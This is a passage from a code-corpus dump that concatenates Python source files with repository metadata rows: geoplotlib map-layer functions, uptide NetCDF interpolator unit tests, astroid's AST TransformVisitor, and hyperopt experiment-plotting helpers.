        fname = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(32))
        if not os.path.isfile(fname + '.png'):
            break

    savefig(fname)

    if os.path.isfile(fname + '.png'):
        with open(fname + '.png', 'rb') as fin:
            encoded = base64.b64encode(fin.read())
        b64 = urllib.parse.quote(encoded)
        image_html = "<img style='width: %dpx; margin: 0px; float: left; border: 1px solid black;' src='data:image/png;base64,%s' />" % (width, b64)
        display(HTML(image_html))
        os.remove(fname + '.png')
def dot(data, color=None, point_size=2, f_tooltip=None):
    """Add a dot-density layer to the map.

    :param data: data access object
    :param color: dot color
    :param point_size: size of each dot
    :param f_tooltip: callable returning a tooltip string for a point
    """
    from geoplotlib.layers import DotDensityLayer
    layer = DotDensityLayer(data, color=color, point_size=point_size,
                            f_tooltip=f_tooltip)
    _global_config.layers.append(layer)
def scatter(data, color=None, point_size=2, f_tooltip=None):
    """Deprecated alias for :func:`dot`.

    Emits a DeprecationWarning and forwards all arguments to dot().
    """
    import warnings
    warnings.warn("deprecated, use geoplotlib.dot", DeprecationWarning)
    dot(data, color, point_size, f_tooltip)
def hist(data, cmap='hot', alpha=220, colorscale='sqrt', binsize=16, show_tooltip=False,
         scalemin=0, scalemax=None, f_group=None, show_colorbar=True):
    """Add a 2D-histogram layer to the map.

    :param data: data access object
    :param cmap: colormap name
    :param alpha: color alpha
    :param colorscale: scaling [lin, log, sqrt]
    :param binsize: size of the hist bins
    :param show_tooltip: show the value of bins on mouseover
    :param scalemin: min value for displaying a bin
    :param scalemax: max value for a bin
    :param f_group: aggregation applied to samples in the same bin
        (defaults to counting)
    :param show_colorbar: show colorbar
    """
    from geoplotlib.layers import HistogramLayer
    layer = HistogramLayer(data, cmap=cmap, alpha=alpha, colorscale=colorscale,
                           binsize=binsize, show_tooltip=show_tooltip,
                           scalemin=scalemin, scalemax=scalemax,
                           f_group=f_group, show_colorbar=show_colorbar)
    _global_config.layers.append(layer)
def graph(data, src_lat, src_lon, dest_lat, dest_lon, linewidth=1, alpha=220, color='hot',
          levels=10, color_by=None, seg_scale='log'):
    """Add a graph layer: one line per (source, destination) pair.

    :param data: data access object
    :param src_lat: field name of source latitude
    :param src_lon: field name of source longitude
    :param dest_lat: field name of destination latitude
    :param dest_lon: field name of destination longitude
    :param linewidth: line width
    :param alpha: color alpha
    :param color: color or colormap
    :param levels: coloring levels
    :param color_by: attribute name for color; defaults to node distance
    :param seg_scale: segmentation scale for coloring, 'log' or 'lin'
        ('lin' only used when not coloring by distance)
    """
    from geoplotlib.layers import GraphLayer
    layer = GraphLayer(data, src_lat, src_lon, dest_lat, dest_lon, linewidth,
                       alpha, color, levels, color_by, seg_scale)
    _global_config.layers.append(layer)
def shapefiles(fname, f_tooltip=None, color=None, linewidth=3, shape_type='full', encoding='utf-8', encodingErrors='strict'):
    """
    Load and draws shapefiles

    :param fname: full path to the shapefile
    :param f_tooltip: function to generate a tooltip on mouseover
    :param color: color
    :param linewidth: line width
    :param shape_type: either full or bbox
    :param encoding: character encoding used when reading the shapefile
    :param encodingErrors: decode error scheme (e.g. 'strict', 'ignore')
    """
    from geoplotlib.layers import ShapefileLayer
    _global_config.layers.append(ShapefileLayer(fname, f_tooltip, color, linewidth, shape_type, encoding, encodingErrors))
def voronoi(data, line_color=None, line_width=2, f_tooltip=None, cmap=None, max_area=1e4, alpha=220):
    """Add a layer with the Voronoi tessellation of the points.

    :param data: data access object
    :param line_color: line color
    :param line_width: line width
    :param f_tooltip: function to generate a tooltip on mouseover
    :param cmap: color map
    :param max_area: scaling constant for coloring the Voronoi areas
    :param alpha: color alpha
    """
    from geoplotlib.layers import VoronoiLayer
    layer = VoronoiLayer(data, line_color, line_width, f_tooltip,
                         cmap, max_area, alpha)
    _global_config.layers.append(layer)
def delaunay(data, line_color=None, line_width=2, cmap=None, max_lenght=100):
    """Add a layer with the Delaunay triangulation of the points.

    :param data: data access object
    :param line_color: line color
    :param line_width: line width
    :param cmap: color map
    :param max_lenght: scaling constant for coloring the edges
        (note: the misspelled name is part of the public interface)
    """
    from geoplotlib.layers import DelaunayLayer
    layer = DelaunayLayer(data, line_color, line_width, cmap, max_lenght)
    _global_config.layers.append(layer)
def convexhull(data, col, fill=True, point_size=4):
    """Add a convex-hull layer for a set of points.

    :param data: points
    :param col: color
    :param fill: fill the convex-hull polygon if True
    :param point_size: size of the hull points; not rendered if None
    """
    from geoplotlib.layers import ConvexHullLayer
    layer = ConvexHullLayer(data, col, fill, point_size)
    _global_config.layers.append(layer)
def kde(data, bw, cmap='hot', method='hist', scaling='sqrt', alpha=220,
        cut_below=None, clip_above=None, binsize=1, cmap_levels=10, show_colorbar=False):
    """Add a kernel-density-estimation layer.

    :param data: data access object
    :param bw: kernel bandwidth (in screen coordinates)
    :param cmap: colormap
    :param method: 'kde' uses statsmodels KDEMultivariate (more accurate,
        much slower); 'hist' applies gaussian smoothing to a 2D histogram
        (much faster, less accurate)
    :param scaling: colorscale, lin log or sqrt
    :param alpha: color alpha
    :param cut_below: densities below cut_below are not drawn
    :param clip_above: max value for the colorscale
    :param binsize: size of the bins for the hist estimator
    :param cmap_levels: discretize colors into cmap_levels levels
    :param show_colorbar: show colorbar
    """
    from geoplotlib.layers import KDELayer
    layer = KDELayer(data, bw, cmap, method, scaling, alpha,
                     cut_below, clip_above, binsize, cmap_levels,
                     show_colorbar)
    _global_config.layers.append(layer)
def markers(data, marker, f_tooltip=None, marker_preferred_size=32):
    """Add a marker-image layer.

    :param data: data access object
    :param marker: full filename of the marker image
    :param f_tooltip: function to generate a tooltip on mouseover
    :param marker_preferred_size: marker image size in pixels
    """
    from geoplotlib.layers import MarkersLayer
    layer = MarkersLayer(data, marker, f_tooltip, marker_preferred_size)
    _global_config.layers.append(layer)
def geojson(filename, color='b', linewidth=1, fill=False, f_tooltip=None):
    """Add a layer drawing GeoJSON features (http://geojson.org/).

    :param filename: filename of the geojson file
    :param color: color for the shapes; if callable, invoked per feature
        with the feature's properties element
    :param linewidth: line width
    :param fill: fill the feature polygon if True, otherwise draw border only
    :param f_tooltip: tooltip callable, invoked per feature with the
        feature's properties element
    """
    from geoplotlib.layers import GeoJSONLayer
    layer = GeoJSONLayer(filename, color=color, linewidth=linewidth,
                         fill=fill, f_tooltip=f_tooltip)
    _global_config.layers.append(layer)
def labels(data, label_column, color=None, font_name=FONT_NAME,
           font_size=14, anchor_x='left', anchor_y='top'):
    """Add a layer drawing a text label for each sample.

    :param data: data access object
    :param label_column: column holding the label text
    :param color: color
    :param font_name: font name
    :param font_size: font size
    :param anchor_x: horizontal anchor
    :param anchor_y: vertical anchor
    """
    from geoplotlib.layers import LabelsLayer
    layer = LabelsLayer(data, label_column, color, font_name,
                        font_size, anchor_x, anchor_y)
    _global_config.layers.append(layer)
def grid(lon_edges, lat_edges, values, cmap, alpha=255, vmin=None, vmax=None, levels=10, colormap_scale='lin', show_colorbar=True):
    """Add a layer displaying values sampled on a uniform lon/lat grid.

    :param lon_edges: longitude edges
    :param lat_edges: latitude edges
    :param values: matrix of values on the grid
    :param cmap: colormap name
    :param alpha: color alpha
    :param vmin: minimum value for the colormap
    :param vmax: maximum value for the colormap
    :param levels: number of colormap levels
    :param colormap_scale: colormap scale
    :param show_colorbar: show the colorbar in the UI
    """
    from geoplotlib.layers import GridLayer
    layer = GridLayer(lon_edges, lat_edges, values, cmap, alpha,
                      vmin, vmax, levels, colormap_scale, show_colorbar)
    _global_config.layers.append(layer)
def clear():
    """
    Remove all existing layers

    (rebinds the list; references to the old layer list are unaffected)
    """
    _global_config.layers = []
def tiles_provider(tiles_provider):
    """
    Set the tile provider

    :param tiles_provider: either one of the built-in providers
    ['watercolor', 'toner', 'toner-lite', 'mapquest', 'darkmatter','positron']
    or a custom provider in the form
    {'url': lambda zoom, xtile, ytile: 'someurl' % (zoom, xtile, ytile),
    'tiles_dir': 'mytiles',
    'attribution': 'my attribution'
    })
    """
    # stored as-is; interpretation happens in the rendering core
    _global_config.tiles_provider = tiles_provider
def add_layer(layer):
    """
    Add a layer

    :param layer: a BaseLayer object (appended after any existing layers)
    """
    _global_config.layers.append(layer)
def set_bbox(bbox):
    """
    Set the map bounding box

    :param bbox: a BoundingBox object used as the initial viewport
    """
    _global_config.bbox = bbox
def set_smoothing(smoothing):
    """
    Enables OpenGL lines smoothing (antialiasing)

    :param smoothing: True to enable smoothing, False to disable
    """
    _global_config.smoothing = smoothing
def set_map_alpha(alpha):
    """
    Alpha color of the map tiles

    :param alpha: int between 0 and 255. 0 is completely dark, 255 is full brightness
    :raises Exception: if alpha is outside [0, 255]
    """
    if alpha < 0 or alpha > 255:
        raise Exception('invalid alpha ' + str(alpha))
    _global_config.map_alpha = alpha
def set_window_size(w, h):
    """
    Set the geoplotlib window size

    :param w: window width in pixels
    :param h: window height in pixels
    """
    _global_config.screen_w = w
    _global_config.screen_h = h
def request_zoom(zoom):
    """Request an explicit initial zoom level for the map."""
    _global_config.requested_zoom = zoom
| andrea-cuttone/geoplotlib | geoplotlib/__init__.py | Python | mit | 12,232 | [
"Gaussian"
] | f1b40f2f66b22c3e06cc57bb82a9a8371a57ea39215ff22920c6d71d9a8fab95 |
import unittest
from uptide.netcdf_reader import NetCDFInterpolator, CoordinateError, NetCDFFile
import itertools
import os
from numpy import arange, array, ones
# function used to fill the netcdf field, has to be linear
def f(lat, lon):
    """Synthetic test field: value = lat*10 + lon.

    Must stay linear so bilinear interpolation reproduces it exactly.
    """
    return lon + lat * 10
test_file_name1 = 'tests/test_netcdf_reader1.nc'
test_file_name2 = 'tests/test_netcdf_reader2.nc'
class TestNetCDFInterpolator(unittest.TestCase):
    """Tests the uptide.netcdf.NetCDFInterpolator class

    The interpolator is exercised over a 10x10 lat/lon grid holding the
    linear field f(lat, lon) = lat*10 + lon, for every permutation of the
    set_field/set_mask/set_ranges calling sequence and both coordinate
    orderings.
    """

    def setUp(self):
        # it seems that many scipy installations are broken for
        # netcdf writing - therefore simply committing the
        # test files instead of writing them out on the fly here
        # NOTE: the early return below deliberately skips the file-writing
        # code; it is kept as documentation of how the committed fixture
        # files were produced.
        return
        zval = array([[f(lat, lon) for lon in arange(10.0)]
                      for lat in arange(10.0)])
        nc = NetCDFFile(test_file_name1, 'w')
        nc.createDimension('lat', 10)
        nc.createDimension('lon', 10)
        nc.createVariable('latitude', 'float64', ('lat', ))
        nc.createVariable('longitude', 'float64', ('lon', ))
        nc.variables['latitude'][:] = arange(10.0)
        nc.variables['longitude'][:] = arange(10.0)
        nc.createVariable('z', 'float64', ('lat', 'lon'))
        nc.variables['z'][:, :] = zval
        nc.createVariable('mask', 'float64', ('lat', 'lon'))
        # mask: first two latitude rows are "land" (0.0), the rest "sea" (1.0)
        mask = ones((10, 10), dtype='float64')
        mask[0:2, :] = 0.0
        nc.variables['mask'][:, :] = mask
        nc.createVariable('transposed_mask', 'float64', ('lon', 'lat'))
        nc.variables['transposed_mask'][:, :] = mask.T
        nc.close()
        # same thing but without the coordinate fields and mask
        nc = NetCDFFile(test_file_name2, 'w')
        nc.createDimension('lat', 10)
        nc.createDimension('lon', 10)
        nc.createVariable('z', 'float64', ('lat', 'lon'))
        nc.variables['z'][:, :] = zval
        nc.close()

    def tearDown(self):
        # don't remove them either (see above)
        return
        os.remove(test_file_name1)
        os.remove(test_file_name2)
        pass

    def _test_prepared_nci(self, nci, perm, coordinate_perm):
        """Run the assertions appropriate for a fully configured nci.

        perm lists which of field/mask/ranges were set;
        coordinate_perm maps (lat, lon) test points to the nci's axis order.
        """
        # first the tests common to all permutations
        # point that is always inside:
        xy = [[4.33, 5.2][i] for i in coordinate_perm]
        self.assertEqual(nci.get_val(xy), f(4.33, 5.2))
        # point outside the domain, should raise exception:
        xy = [[-4.95, 8.3][i] for i in coordinate_perm]
        self.assertRaises(CoordinateError, nci.get_val, xy)
        if set(perm).intersection('mask', 'transposed_mask', 'mask_from_fill_value'):
            # point within sea, should work as before:
            xy = [[4.33, 5.2][i] for i in coordinate_perm]
            self.assertAlmostEqual(nci.get_val(xy), f(4.33, 5.2))
            # point between row of land and of sea points, should interpolate from nearest sea row:
            xy = [[1.2, 8.3][i] for i in coordinate_perm]
            self.assertAlmostEqual(nci.get_val(xy), f(2.0, 8.3))
            # point inside the first two land rows, should raise exception
            xy = [[0.95, 8.3][i] for i in coordinate_perm]
            self.assertRaises(CoordinateError, nci.get_val, xy)
        if 'ranges' in perm:
            # test within the range
            xy = [[2.9, 7.0][i] for i in coordinate_perm]
            self.assertAlmostEqual(nci.get_val(xy), f(2.9, 7.))
            # tests outside the range, should raise exception
            xy = [[3.2, 0.9][i] for i in coordinate_perm]
            self.assertRaises(CoordinateError, nci.get_val, xy)
            xy = [[5.9, 9.0][i] for i in coordinate_perm]
            self.assertRaises(CoordinateError, nci.get_val, xy)

    # test a specific permutation of the calling sequence set_field, set_mask, set_ranges
    # and specific coordinate_perm (lat, lon) or (lon, lat)
    def _test_permutation(self, perm, coordinate_perm):
        # load the netcdf created in setup()
        if coordinate_perm == (0, 1):
            nci = NetCDFInterpolator(test_file_name1, ('lat', 'lon'), ('latitude', 'longitude'))
        else:
            nci = NetCDFInterpolator(test_file_name1, ('lon', 'lat'), ('longitude', 'latitude'))
        # call the methods in the order given by perm
        for x in perm:
            if x == 'field':
                nci.set_field('z')
            elif x == 'mask':
                nci.set_mask('mask')
            elif x == 'transposed_mask':
                nci.set_mask('transposed_mask')
            elif x == 'mask_from_fill_value':
                nci.set_mask_from_fill_value('mask', 0.0)
            elif x == 'ranges':
                # ranges are given in the nci's own axis order
                if coordinate_perm == (0, 1):
                    nci.set_ranges(((0., 4.), (2., 8.)))
                else:
                    nci.set_ranges(((2., 8.), (0., 4.)))
            else:
                raise Exception("Unknown method")
        # now perform all tests
        if 'field' in perm:
            # if 'field' is not in perm we only test reading the field from nci2
            self._test_prepared_nci(nci, perm, coordinate_perm)
        # now try the same for the case where the field values are stored in a separate file
        nci2 = NetCDFInterpolator(test_file_name2, nci)
        nci2.set_field('z')
        self._test_prepared_nci(nci2, perm, coordinate_perm)

    # test all permutations of the calling sequence set_field, set_mask, set_ranges
    # including all permutations that only call 1 or 2 of these methods
    # set_field should always be called
    # also try out coordinate permutations lat, lon and lon, lat (the read nc file is lat, lon in both cases)
    def test_all_permutations(self):
        for n in range(1, 4):
            for perm in itertools.permutations(['field', 'mask', 'ranges'], n):
                for coordinate_perm in ((0, 1), (1, 0)):
                    self._test_permutation(perm, coordinate_perm)

    def test_all_permutations_with_fill_value(self):
        """Same sweep, but the mask is derived from a fill value."""
        for n in range(1, 4):
            for perm in itertools.permutations(['field', 'mask_from_fill_value', 'ranges'], n):
                for coordinate_perm in ((0, 1), (1, 0)):
                    self._test_permutation(perm, coordinate_perm)

    def test_all_permutations_with_transposed_mask(self):
        """Same sweep, but the mask variable has transposed dimensions."""
        for n in range(1, 4):
            for perm in itertools.permutations(['field', 'transposed_mask', 'ranges'], n):
                for coordinate_perm in ((0, 1), (1, 0)):
                    self._test_permutation(perm, coordinate_perm)
if __name__ == '__main__':
unittest.main()
| stephankramer/uptide | tests/test_netcdf_reader.py | Python | lgpl-3.0 | 6,525 | [
"NetCDF"
] | 847418e65ffe0805c3ff5fca756b67664f450fdd2b7318183b33c0bcb64a26dc |
# Copyright (c) 2015-2016, 2018 Claudiu Popa <pcmanticore@gmail.com>
# Copyright (c) 2016 Ceridwen <ceridwenv@gmail.com>
# Copyright (c) 2018 Nick Drozd <nicholasdrozd@gmail.com>
# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html
# For details: https://github.com/PyCQA/astroid/blob/master/COPYING.LESSER
import collections
from functools import lru_cache
class TransformVisitor:
    """A visitor that applies registered transform functions to a tree.

    Typical usage is to call :meth:`visit` with an *astroid* module; the
    visitor walks the whole tree and runs the registered transforms on
    every node it encounters.
    """

    TRANSFORM_MAX_CACHE_SIZE = 10000

    def __init__(self):
        self.transforms = collections.defaultdict(list)

    @lru_cache(maxsize=TRANSFORM_MAX_CACHE_SIZE)
    def _transform(self, node):
        """Apply every matching transform to *node* and return the result.

        A transform may return a replacement node; once the node's class
        changes, the remaining transforms registered for the old class
        no longer apply.
        """
        cls = node.__class__
        if cls not in self.transforms:
            # no transform registered for this class of node
            return node

        for transform_func, predicate in self.transforms[cls]:
            if predicate is not None and not predicate(node):
                continue
            ret = transform_func(node)
            if ret is None:
                # no replacement produced; keep the current node
                continue
            node = ret
            if ret.__class__ != cls:
                # Can no longer apply the rest of the transforms.
                break
        return node

    def _visit(self, node):
        """Recursively transform the children of *node*, then *node* itself."""
        if hasattr(node, "_astroid_fields"):
            for field in node._astroid_fields:
                old_value = getattr(node, field)
                new_value = self._visit_generic(old_value)
                if new_value != old_value:
                    setattr(node, field, new_value)
        return self._transform(node)

    def _visit_generic(self, value):
        """Dispatch on the container kind of a child field value."""
        if isinstance(value, list):
            return [self._visit_generic(item) for item in value]
        if isinstance(value, tuple):
            return tuple(self._visit_generic(item) for item in value)
        if not value or isinstance(value, str):
            # empty/None values and plain strings are left untouched
            return value
        return self._visit(value)

    def register_transform(self, node_class, transform, predicate=None):
        """Register `transform(node)` to run on nodes of *node_class*.

        The transform fires when *predicate* is None or returns true for
        the node.  A non-None return value from the transform replaces
        the original node in the tree.
        """
        self.transforms[node_class].append((transform, predicate))

    def unregister_transform(self, node_class, transform, predicate=None):
        """Unregister the given transform."""
        self.transforms[node_class].remove((transform, predicate))

    def visit(self, module):
        """Walk *module* and return it with all transforms applied.

        Only nodes with registered transforms are actually replaced or
        changed.
        """
        module.body = [self._visit(stmt) for stmt in module.body]
        return self._transform(module)
| ekwoodrich/python-dvrip | env/lib/python3.5/site-packages/astroid/transforms.py | Python | mit | 3,377 | [
"VisIt"
] | d67a70256710512223729716775a5cf9d261b473b289ba101ec11300841de5ca |
"""
Functions to visualize an Experiment.
"""
__authors__ = "James Bergstra"
__license__ = "3-clause BSD License"
__contact__ = "James Bergstra <pylearn-dev@googlegroups.com>"
import math
import sys
# -- don't import this here because it locks in the backend
# and we want the unittests to be able to set the backend
##import matplotlib.pyplot as plt
import numpy as np
from . import base
from .base import miscs_to_idxs_vals
default_status_colors = {
base.STATUS_NEW: 'k',
base.STATUS_RUNNING: 'g',
base.STATUS_OK:'b',
base.STATUS_FAIL:'r'}
def algo_as_str(algo):
    """Render an algorithm for use in a plot title.

    Strings pass through unchanged; anything else goes through str().
    """
    return algo if isinstance(algo, basestring) else str(algo)
def main_plot_history(trials, bandit=None, algo=None, do_show=True,
status_colors=None):
# -- import here because file-level import is too early
import matplotlib.pyplot as plt
# self is an Experiment
if status_colors is None:
status_colors = default_status_colors
Xs = trials.specs
# XXX: show the un-finished or error trials
Ys, colors = zip(*[(y, status_colors[s])
for y, s in zip(trials.losses(bandit), trials.statuses(bandit))
if y is not None])
plt.scatter(range(len(Ys)), Ys, c=colors)
plt.xlabel('time')
plt.ylabel('loss')
if bandit is not None and bandit.loss_target is not None:
plt.axhline(bandit.loss_target)
ymin = min(np.min(Ys), bandit.loss_target)
ymax = max(np.max(Ys), bandit.loss_target)
yrange = ymax - ymin
ymean = (ymax + ymin) / 2.0
plt.ylim(
ymean - 0.53 * yrange,
ymean + 0.53 * yrange,
)
best_err = trials.average_best_error(bandit)
print "avg best error:", best_err
plt.axhline(best_err, c='g')
plt.title('bandit: %s algo: %s' % (
bandit.short_str() if bandit else '-',
algo_as_str(algo)))
if do_show:
plt.show()
def main_plot_histogram(trials, bandit=None, algo=None, do_show=True):
    """Plot a histogram of the finite losses of all trials.

    trials: Trials-like object; bandit/algo are used for losses and the title.
    """
    # -- import here because file-level import is too early
    import matplotlib.pyplot as plt
    status_colors = default_status_colors
    # keep only trials with a computed loss (y is not None)
    Xs, Ys, Ss, Cs = zip(*[(x, y, s, status_colors[s])
        for (x, y, s) in zip(trials.specs, trials.losses(bandit),
            trials.statuses(bandit))
        if y is not None])

    # XXX: deal with ok vs. un-finished vs. error trials
    print 'Showing Histogram of %i jobs' % len(Ys)
    plt.hist(Ys)
    plt.xlabel('loss')
    plt.ylabel('frequency')

    plt.title('bandit: %s algo: %s' % (
        bandit.short_str() if bandit else '-',
        algo_as_str(algo)))
    if do_show:
        plt.show()
def main_plot_vars(trials, bandit=None, do_show=True, fontsize=10,
        colorize_best=None,
        columns=5,
        ):
    """Scatter-plot every hyperparameter against trial index, colored by loss.

    trials: Trials-like object; bandit supplies parameter metadata.
    colorize_best: if set, highlight (in green) the colorize_best best trials.
    columns: number of subplot columns.
    """
    # -- import here because file-level import is too early
    import matplotlib.pyplot as plt
    idxs, vals = miscs_to_idxs_vals(trials.miscs)
    losses = trials.losses()
    finite_losses = [y for y in losses if y not in (None, float('inf'))]
    asrt = np.argsort(finite_losses)
    if colorize_best != None:
        # loss value separating the "best" trials from the rest
        colorize_thresh = finite_losses[asrt[colorize_best + 1]]
    else:
        # -- set to lower than best (disabled)
        colorize_thresh = finite_losses[asrt[0]] - 1

    loss_min = min(finite_losses)
    loss_max = max(finite_losses)
    print 'finite loss range', loss_min, loss_max, colorize_thresh

    loss_by_tid = dict(zip(trials.tids, losses))

    # NOTE(review): color_fn is currently unused; only color_fn_bw is used below.
    def color_fn(lossval):
        if lossval is None:
            return (1, 1, 1)
        else:
            t = 4 * (lossval - loss_min) / (loss_max - loss_min + .0001)
            if t < 1:
                return t, 0, 0
            if t < 2:
                return 2-t, t-1, 0
            if t < 3:
                return 0, 3-t, t-2
            return 0, 0, 4-t

    def color_fn_bw(lossval):
        # greyscale by loss (white=worst, black=best); green for "best" trials
        if lossval in (None, float('inf')):
            return (1, 1, 1)
        else:
            t = (lossval - loss_min) / (loss_max - loss_min + .0001)
            if lossval < colorize_thresh:
                return (0., 1. - t, 0.)  # -- red best black worst
            else:
                return (t, t, t)  # -- white=worst, black=best

    all_labels = list(idxs.keys())
    titles = ['%s (%s)' % (label, bandit.params[label].name)
              for label in all_labels]
    order = np.argsort(titles)

    C = columns
    R = int(np.ceil(len(all_labels) / float(C)))

    for plotnum, varnum in enumerate(order):
        #print varnum, titles[varnum]
        label = all_labels[varnum]
        plt.subplot(R, C, plotnum + 1)

        #print '-' * 80
        #print 'Node', label

        # hide x ticks
        ticks_num, ticks_txt = plt.xticks()
        plt.xticks(ticks_num, ['' for i in xrange(len(ticks_num))])

        dist_name = bandit.params[label].name
        x = idxs[label]
        if 'log' in dist_name:
            # plot log-distributed parameters on a log (value) axis
            y = np.log(vals[label])
        else:
            y = vals[label]
        plt.title(titles[varnum], fontsize=fontsize)
        c = map(color_fn_bw, [loss_by_tid[ii] for ii in idxs[label]])
        if len(y):
            plt.scatter(x, y, c=c)
        if 'log' in dist_name:
            nums, texts = plt.yticks()
            plt.yticks(nums, ['%.2e' % np.exp(t) for t in nums])

    if do_show:
        plt.show()
if 0:
    # -- Disabled (dead) code: statistical helpers for estimating the test
    #    score of the best-on-validation model among Bernoulli-scored trials.
    def erf(x):
        """Erf impl that doesn't require scipy.

        Abramowitz & Stegun formula 7.1.26 (max abs error ~1.5e-7).
        """
        # from http://www.math.sfu.ca/~cbm/aands/frameindex.htm
        # via
        # http://stackoverflow.com/questions/457408/
        # is-there-an-easily-available-implementation-of-erf-for-python
        #
        # save the sign of x: erf is odd, so compute on |x| and restore sign
        sign = 1
        if x < 0:
            sign = -1
        x = abs(x)

        # constants
        a1 = 0.254829592
        a2 = -0.284496736
        a3 = 1.421413741
        a4 = -1.453152027
        a5 = 1.061405429
        p = 0.3275911

        # A&S formula 7.1.26
        t = 1.0 / (1.0 + p * x)
        y = 1.0 - (((((a5 * t + a4) * t) + a3) * t + a2) * t + a1) * t * math.exp(-x * x)
        return sign * y  # erf(-x) = -erf(x)

    def mixed_max_erf(scores, n_valid):
        """Estimate the test score of the best-on-validation model.

        :param scores: iterable of (validation_score, test_score) pairs, each
            score being the mean of n_valid Bernoulli outcomes
        :param n_valid: size of the validation set
        :returns: expected test score, weighting each model by the Gaussian
            (erf-based) probability that it is truly best on validation
        """
        scores = list(scores)  # shallow copy
        scores.sort()          # sort the copy
        scores.reverse()       # best validation score first
        # this is valid for classification
        # where the scores are the means of Bernoulli variables.
        best_mean = scores[0][0]
        best_variance = best_mean * (1.0 - best_mean) / (n_valid - 1)
        rval = 0.0
        rval_denom = 0.0
        for i, (vscore, tscore) in enumerate(scores):
            mean = vscore
            variance = mean * (1.0 - mean) / (n_valid - 1)
            diff_mean = mean - best_mean
            diff_variance = variance + best_variance
            # for scores, which should approach 1, the diff here will be
            # negative (or zero), so the probability of the current point
            # being the best is the probability that the difference gaussian
            # puts on positive values.
            assert diff_mean <= 0.0
            p_current_is_best = 0.5 - 0.5 * erf(-diff_mean / math.sqrt(diff_variance))
            rval += p_current_is_best * tscore
            rval_denom += p_current_is_best
            if p_current_is_best < 0.001:
                # scores are sorted, so every later model is even less likely
                break
        return rval / rval_denom

    def mixed_max_sampled(scores, n_valid, n_samples=100, rng=None):
        """Monte-Carlo analogue of mixed_max_erf.

        Samples Gaussian score differences and counts how often each model
        wins.

        :returns: (expected test score, per-model win probabilities)
        """
        scores = list(scores)  # shallow copy
        scores.sort()          # sort the copy
        scores.reverse()       # best validation score first
        # this is valid for classification
        # where the scores are the means of Bernoulli variables.
        best_mean = scores[0][0]
        best_variance = best_mean * (1.0 - best_mean) / (n_valid - 1)
        mu = []
        sigma = []
        tscores = []
        for i, (vscore, tscore) in enumerate(scores):
            mean = vscore
            variance = mean * (1.0 - mean) / (n_valid - 1)
            diff_mean = mean - best_mean
            diff_variance = variance + best_variance
            # for scores, which should approach 1, the diff here will be
            # negative (or zero); models more than 3 sigma below the best
            # are skipped (and all later ones, since scores are sorted).
            if -diff_mean / np.sqrt(diff_variance) > 3:
                break
            else:
                mu.append(diff_mean)
                sigma.append(np.sqrt(diff_variance))
                tscores.append(tscore)
        if rng is None:
            rng = np.random.RandomState(232342)
        mu = np.asarray(mu)
        sigma = np.asarray(sigma)
        tscores = np.asarray(tscores)
        nrml = rng.randn(n_samples, len(mu)) * sigma + mu
        # winners[i, j] is True iff model i attains the max in sample j
        winners = (nrml.T == nrml.max(axis=1))
        # BUGFIX: count wins per *model* (axis=1); axis=0 counted wins per
        # sample, which has the wrong shape for the np.dot below.
        p_best_ = winners.sum(axis=1)
        # BUGFIX: force true division (integer counts floor-divide under
        # Python 2); also the original returned the misspelled name
        # 't_scores' (NameError) instead of 'tscores'.
        p_best = p_best_ / float(p_best_.sum())
        return np.dot(p_best, tscores), p_best
if 0:
    # -- Disabled (dead) code kept for reference.
    def rexp_plot_acc(scores, n_valid, n_test, pbest_n_samples=100, rng=None):
        """
        Uses the current pyplot figure to show efficiency of random experiment.

        :type scores: a list of (validation accuracy, test accuracy) pairs
        :param scores: results from the trials of a random experiment

        :type n_valid: integer
        :param n_valid: size of the validation set

        :type n_test: integer
        :param n_test: size of the test set

        :type mixed_max: function like mixed_max_erf or mixed_max_sampled
        :param mixed_max: the function to estimate the maximum of a validation sample

        NOTE(review): calls pbest_sampled(), plt and math, none of which are
        defined/imported at this scope in the visible module; also uses the
        Python 2 xrange builtin.  Confirm before re-enabling.
        """
        if rng is None:
            rng = np.random.RandomState(232342)
        K = 1
        scatter_x = []
        scatter_y = []
        scatter_c = []
        box_x = []
        log_K = 0
        # double the batch size K until fewer than two full batches remain
        while K < len(scores):
            n_batches_of_K = len(scores)//K
            if n_batches_of_K < 2:
                break
            def best_score(i):
                # expected test score of the best-on-validation model
                # within the i'th batch of K trials
                scores_i = scores[i*K:(i+1)*K]
                rval = np.dot(
                        [tscore for (vscore,tscore) in scores_i],
                        pbest_sampled(
                            [vscore for (vscore,tscore) in scores_i],
                            n_valid,
                            n_samples=pbest_n_samples,
                            rng=rng))
                return rval
            if n_batches_of_K < 10:
                # use scatter plot
                for i in xrange(n_batches_of_K):
                    scatter_x.append(log_K+1)
                    scatter_y.append(best_score(i))
                    scatter_c.append((0,0,0))
                box_x.append([])
            else:
                # use box plot
                box_x.append([best_score(i) for i in xrange(n_batches_of_K)])
            K *= 2
            log_K += 1
        plt.scatter( scatter_x, scatter_y, c=scatter_c, marker='+', linewidths=0.2,
                edgecolors=scatter_c)
        boxplot_lines = plt.boxplot(box_x)
        for key in boxplot_lines:
            plt.setp(boxplot_lines[key], color='black')

        # draw the spans
        #
        # the 'test performance of the best model' is a mixture of
        # gaussian-distributed quantities with components comp_mean,
        # comp_var and weights w
        #
        # w[i] is prob. of i'th model being best in validation
        w = pbest_sampled([vs for (vs,ts) in scores], n_valid, n_samples=pbest_n_samples, rng=rng)
        comp_mean = np.asarray([ts for (vs,ts) in scores])
        comp_var = (comp_mean * (1-comp_mean)) / (n_test-1)

        # the mean of the mixture is
        mean = np.dot(w, comp_mean)
        # the variance of the mixture is
        var = np.dot(w, comp_mean**2 + comp_var) - mean**2
        # test average is distributed according to a mixture of gaussians,
        # so use the mixture std for the 95% band
        std = math.sqrt(var)
        plt.axhline(mean-1.96*std, color=(0.0,0.0,0.0))
        plt.axhline(mean+1.96*std, color=(0.0,0.0,0.0))

        # get margin:
        if 0:
            margin = 1.0 - mean
            plt.ylim(0.5-margin, 1.0 )

        # set ticks: x axis position log_K+1 corresponds to batch size 2**log_K
        ticks_num, ticks_txt = plt.xticks()
        plt.xticks(ticks_num, ['%i'%(2**i) for i in xrange(len(ticks_num))])
def rexp_pairs_raw(x, y, vscores):
    """Scatter-plot y vs. x, shaded in grayscale by validation score.

    The best validation score maps to the darkest gray and the worst to the
    lightest.  Axis tick labels are blanked, so this is intended for use
    inside a grid of subplots.

    :param x, y: equal-length coordinate sequences
    :param vscores: validation score per point, used only for coloring
    :raises ValueError: if the three inputs do not have the same length
    """
    if len(x) != len(y):
        raise ValueError()
    if len(x) != len(vscores):
        raise ValueError()
